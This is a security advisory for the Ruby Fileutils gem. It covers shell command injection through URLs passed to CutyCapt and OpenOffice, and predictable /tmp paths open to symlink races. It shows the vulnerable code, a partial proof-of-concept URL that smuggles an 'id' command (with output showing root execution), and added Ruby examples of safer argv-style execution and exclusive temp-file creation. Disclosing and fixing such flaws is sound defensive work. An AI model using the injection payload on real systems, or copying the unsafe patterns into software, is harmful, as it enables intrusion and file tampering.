utils.rb' Remote Command Execution Vulnerability

Published: 2013-02-23
Updated: 2013-03-02

Affected systems:
rubygems Fileutils
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58223

RubyGems Fileutils is a set of utility classes that extract metadata from various file types.

Fileutils does not properly filter the input it passes to CutyCapt, so the implementation contains multiple remote command execution vulnerabilities; it also handles files in /tmp insecurely. A local attacker can exploit these flaws to execute arbitrary commands.

<*Source: Larry W. Cashdollar (lwc@vapid.dhs.org)

  Link:
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users bear the risk themselves!

Possible remote command execution and insecure file handling in /tmp.
2/23/2013

"A set of utility classes to extract meta data from different file types".

Handles files insecurely in /tmp: a directory is created for that file extension, say 'zip', and files are manipulated there. This directory can be hijacked and the contents manipulated by a malicious user.

in ./lib/file_utils.rb

    # lib/file_utils.rb, lines 15-22 of the gem: the target directory name is
    # guessable and chosen by a check-then-create loop in a world-writable /tmp
    def zip (target, *sources)
        targetdir = "#{FileUtils::Config.tmp_dir}/zip"
        id = 1
        while File.exists?(targetdir)
            targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
            id += 1
        end
        FileUtils.mkdir(targetdir)

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

    # lib/file_utils/config.rb, lines 5-7
    def self.tmp_dir
        @tmp_dir ||= '/tmp'
    end

Remote command execution:

From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL contains shell characters, say a ';' followed by a command, a remote attacker can execute a command on the client's system if they are enticed to click an encoded URL like:

Need to test URL encoding; not sure if this is valid.

;id>/tmp/o; ->

    # lib/file_utils.rb, lines 7-10: url and target are interpolated into a
    # single string that the backquotes hand to /bin/sh
    def capture (url, target)
        command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
        `#{command}`
    end

partial PoC if client is tricked into using malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf`
xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>

root@Ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#

Michael Scherer of RedHat.com found other issues during a discussion about the above issues I found:

In fact, there is the same similar problem in another file:

    result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb (a quick command line to type Ruby snippets), and yes, using funky chars results in funky results.
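Both shell-string invocations, the CutyCapt command in capture and the OpenOffice command quoted just above, have the same root cause: untrusted text is interpolated into one string that the backquotes hand to /bin/sh. The block below is an added example, not code from the Fileutils gem or from the advisory. It reproduces the string form the gem uses beside an argv form that is executed directly with no shell, and layers an allow-list URL check on top. `echo` stands in for the CutyCapt binary so the block runs anywhere; the marker path, the hostile URL and the function names are the example's own constructed values.

```ruby
require 'open3'
require 'uri'
require 'tmpdir'

# Constructed sample values: a marker file the injected 'id>...' would create,
# and a URL carrying the advisory's payload shape aimed at that marker.
MARKER = File.join(Dir.tmpdir, "fileutils_demo_#{Process.pid}")
HOSTILE_URL = "http://www.example.org;id>#{MARKER};"

# What the gem does: one string, evaluated by sh, so ';' ends the CutyCapt
# command and whatever follows runs as a second command.
def shell_form(url, target)
  "./CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}"
end

# Argv form (hypothetical replacement for capture): each element becomes one
# argument of a direct execve(); no shell ever sees ';', '>', '$(...)' or `...`.
def cutycapt_argv(url, target, cutycapt: './CutyCapt')
  [cutycapt, '--min-width=1024', '--min-height=768', "--url=#{url}", "--out=#{target}"]
end

# Second layer: accept only http/https URLs with a host and only RFC 3986
# characters. The '>' in the sample fails this; the argv form is still the
# primary fix because an allow-list alone is easy to get subtly wrong.
URI_CHARS = %r{\A[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+\z}
def safe_url?(url)
  return false unless url.match?(URI_CHARS)
  uri = URI.parse(url)
  %w[http https].include?(uri.scheme) && !uri.host.nil? && !uri.host.empty?
rescue URI::InvalidURIError
  false
end

# Run the argv without a shell and return what the child actually received.
# Open3.capture2 with several arguments spawns the program directly.
def run_without_shell(url, target)
  argv = cutycapt_argv(url, target, cutycapt: 'echo')
  out, _status = Open3.capture2(*argv)
  out
end

if __FILE__ == $PROGRAM_NAME
  puts shell_form(HOSTILE_URL, '/tmp/tempf')        # the line sh would split
  puts run_without_shell(HOSTILE_URL, '/tmp/tempf') # same bytes, one argument
  puts "marker written? #{File.exist?(MARKER)}"     # false
  puts "safe_url? #{safe_url?(HOSTILE_URL)}"        # false
end
```

The child sees the whole `--url=http://www.example.org;id>...;` string as a single argument, so nothing is written to the marker path. Note that Ruby skips the shell only when the command is passed as multiple arguments; a single-string `system("...")` or backquote still goes through sh when the string contains metacharacters.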

There is another issue in

    # Generates a temp filepath for the given extension
    def temp (extension)
        path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
        id = 1
        while File.exists?(path)
            path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
            id += 1
        end
        path   # closing lines restored: the method only picks a name; the caller opens it later
    end

Since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.

Thanks to vl4dz and Michael.

Larry W. Cashdollar @_larry0
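Both /tmp findings in the advisory above, the guessable zip/zipN directory and the temp path that is computed first and opened later, are check-then-use races in a world-writable directory. The block below is an added example, not code from the gem or from the advisory. It reproduces the naming scheme inside a scratch directory, plants the symlink Michael describes, and shows the two hardened forms beside the weak ones: Dir.mktmpdir for a private, randomly named 0700 directory created atomically, and an open with O_CREAT|O_EXCL|O_NOFOLLOW that refuses to write through a pre-planted link. The scratch directory, file names and function names are the example's own.

```ruby
require 'tmpdir'
require 'fileutils'   # Ruby's stdlib FileUtils, not the gem discussed here

# Constructed sandbox standing in for Config.tmp_dir, removed on exit.
WORK = Dir.mktmpdir('fileutils_demo')
at_exit { FileUtils.remove_entry(WORK) }

# Pattern 1 (the gem's zip/temp helpers): a predictable name picked by an
# exists?/create loop. Anyone who wins the race owns the path the gem uses.
def predictable_path(base, stem)
  path = "#{base}/#{stem}"
  id = 1
  while File.exist?(path)
    path = "#{base}/#{stem}#{id}"
    id += 1
  end
  path
end

# Hardened: mktmpdir creates a random-suffix directory with mode 0700 in one
# mkdir() call, so a directory planted by someone else is an error, not reused.
def private_workdir(base, stem)
  Dir.mktmpdir(stem, base)
end

# Pattern 2 (Michael's note): simulate the attacker planting a symlink at the
# name temp() would hand back, pointing at a file they want overwritten.
def symlink_attack(base, victim)
  name = predictable_path(base, 'tmp.zip')
  File.symlink(victim, name)
  name
end

# A plain open follows the link and clobbers the victim.
def naive_write(path, data)
  File.write(path, data)
end

# O_CREAT|O_EXCL fails with EEXIST when the name exists in any form (symlink
# included); O_NOFOLLOW additionally refuses links on its own. Returns false
# instead of writing when the path was tampered with.
def exclusive_write(path, data)
  flags = File::WRONLY | File::CREAT | File::EXCL | File::NOFOLLOW
  File.open(path, flags, 0600) { |f| f.write(data) }
  true
rescue Errno::EEXIST, Errno::ELOOP
  false
end

# Runs both patterns and reports what happened to the victim file.
def demo
  victim = File.join(WORK, 'victim.txt')
  File.write(victim, 'original')
  link = symlink_attack(WORK, victim)

  naive_write(link, 'clobbered')
  after_naive = File.read(victim)          # "clobbered": written through the link

  File.write(victim, 'original')
  refused = !exclusive_write(link, 'clobbered')
  after_exclusive = File.read(victim)      # "original": the open was refused

  dir = private_workdir(WORK, 'zip')
  { after_naive: after_naive, refused: refused, after_exclusive: after_exclusive,
    dir_mode: File.stat(dir).mode & 0777, dir_random: File.basename(dir) != 'zip' }
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

The exclusive open is the fix for the temp() pattern and mktmpdir for the zip() pattern; combining them (exclusive opens inside a private 0700 directory) removes the need for /tmp-wide unique naming altogether, since nothing outside the process can reach the directory in the first place.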

Recommendations:
--------------------------------------------------------------------------------
Vendor patches:

rubygems
--------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

https://rubygems.org/gems/fileutils


Source: https://www.heiqu.com/wywgdw.html